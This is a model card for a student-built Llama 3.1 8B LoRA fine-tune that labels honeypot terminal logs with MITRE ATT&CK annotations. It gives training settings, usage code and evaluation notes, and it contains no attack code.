| --- |
| license: mit |
| base_model: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit |
| tags: |
| - cybersecurity |
| - mitre-attack |
| - honeypot |
| - log-analysis |
| - llama |
| - lora |
| - security |
| - threat-detection |
| language: |
| - en |
| datasets: |
| - custom |
| library_name: transformers |
| pipeline_tag: text-generation |
| --- |
| |
| # LLM-Enhanced Honeypot Log Analysis Model |
|
|
| ## Model Description |
|
|
| This model is a fine-tuned version of Llama 3.1 8B Instruct, specialized for analyzing honeypot logs and generating MITRE ATT&CK framework annotations. It was developed as part of a research project at Queen's University Belfast investigating automated security log analysis using Large Language Models. |
|
|
| ## Key Features |
|
|
| - **MITRE ATT&CK Annotation**: Automatically generates structured annotations for security events |
| - **Honeypot Log Analysis**: Specialized in analyzing Unix terminal logs from honeypot systems |
| - **LoRA Fine-tuning**: Uses Low-Rank Adaptation for efficient parameter updates |
| - **Research-Grade**: Developed for academic research in cybersecurity and AI |
|
|
| ## Model Details |
|
|
| ### Base Model |
| - **Base Model**: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit |
| - **Model Size**: 8B parameters |
| - **Architecture**: Llama 3.1 with Instruct tuning |
| - **Quantization**: 4-bit quantization for efficiency |
|
|
| ### Fine-tuning Details |
| - **Method**: LoRA (Low-Rank Adaptation) |
| - **LoRA Rank**: 32 |
| - **LoRA Alpha**: 32 |
| - **LoRA Dropout**: 0 |
| - **Learning Rate**: 0.00012 |
| - **Batch Size**: 2 |
| - **Gradient Accumulation**: 4 |
| - **Max Steps**: 100 |
| - **Optimizer**: adamw_8bit |
| |
| ## Training Data |
| |
| The model was trained on a curated dataset of honeypot logs with human-annotated MITRE ATT&CK framework labels. The training data includes: |
| |
| - Unix terminal command logs from honeypot systems |
| - Structured annotations for 6 key MITRE ATT&CK fields |
| - Balanced representation of different attack tactics and techniques |
| |
| ## Usage |
| |
| ### Installation |
| |
| ```bash |
| pip install transformers torch unsloth |
| ``` |
| |
| ### Loading the Model |
| |
| ```python |
| from unsloth import FastLanguageModel |
| |
| model, tokenizer = FastLanguageModel.from_pretrained( |
| model_name="your-username/model-name", |
| max_seq_length=2048, |
| dtype=None, |
| load_in_4bit=True, |
| ) |
| ``` |
| |
| ### Inference |
|
|
| ```python |
| # Enable inference mode |
| FastLanguageModel.for_inference(model) |
| |
| # Format your input |
| prompt = '''Below is a Unix terminal command log from a honeypot system. Please analyze it and provide MITRE ATT&CK framework annotations. |
| |
| Command: {command} |
| Timestamp: {timestamp} |
| Source IP: {source_ip} |
| |
| Please provide: |
| 1. Tactic |
| 2. Technique |
| 3. Sub-technique |
| 4. Description' |
| |
| inputs = tokenizer(prompt, return_tensors="pt") |
| outputs = model.generate(**inputs, max_new_tokens=1024, temperature=0.7) |
| response = tokenizer.decode(outputs[0], skip_special_tokens=True) |
| ``` |
|
|
| ## Evaluation |
|
|
| The model has been evaluated on multiple metrics: |
|
|
| - **Overall MITRE Accuracy**: Novel composite metric combining all 6 MITRE ATT&CK field accuracies |
| - **Confusion Matrix Analysis**: Visual analysis of tactics classification performance |
| - **Field-level Accuracy**: Individual accuracy for each MITRE ATT&CK field |
| - **Human Evaluation**: Expert validation of generated annotations |
|
|
| ## Limitations |
|
|
| - Specialized for honeypot log analysis - may not generalize to other security contexts |
| - Requires structured input format for optimal performance |
| - Training data limited to specific honeypot configurations |
| - May exhibit biases present in training data |
|
|
| ## Ethical Considerations |
|
|
| This model is designed for defensive cybersecurity research and should be used responsibly: |
|
|
| - Intended for legitimate security research and defense applications |
| - Should not be used for malicious purposes or unauthorized access |
| - Users should validate outputs before making security decisions |
| - Consider privacy implications when analyzing logs |
|
|
| ## Citation |
|
|
| If you use this model in your research, please cite: |
|
|
| ```bibtex |
| @misc{llm_honeypot_analysis_2025, |
| title={LLM-Enhanced Honeypot Log Analysis System}, |
| author={[Student Name]}, |
| year={2025}, |
| institution={Queen's University Belfast}, |
| course={CSC4003 - Research Project}, |
| url={https://gitlab.eeecs.qub.ac.uk/[student-id]/CSC4003} |
| } |
| ``` |
|
|
| ## License |
|
|
| This model is released under the MIT License. See the LICENSE file for details. |
|
|
| ## Contact |
|
|
| For questions or issues: |
| - Repository: https://gitlab.eeecs.qub.ac.uk/40285272/CSC4006 |
| - Institution: Queen's University Belfast |
| - Course: CSC4006 - Research Project |
|
|
| ## Acknowledgments |
|
|
| - Built using the Unsloth library for efficient training |
| - Based on Meta's Llama 3.1 model |
| - Developed as part of cybersecurity research at Queen's University Belfast |
|
|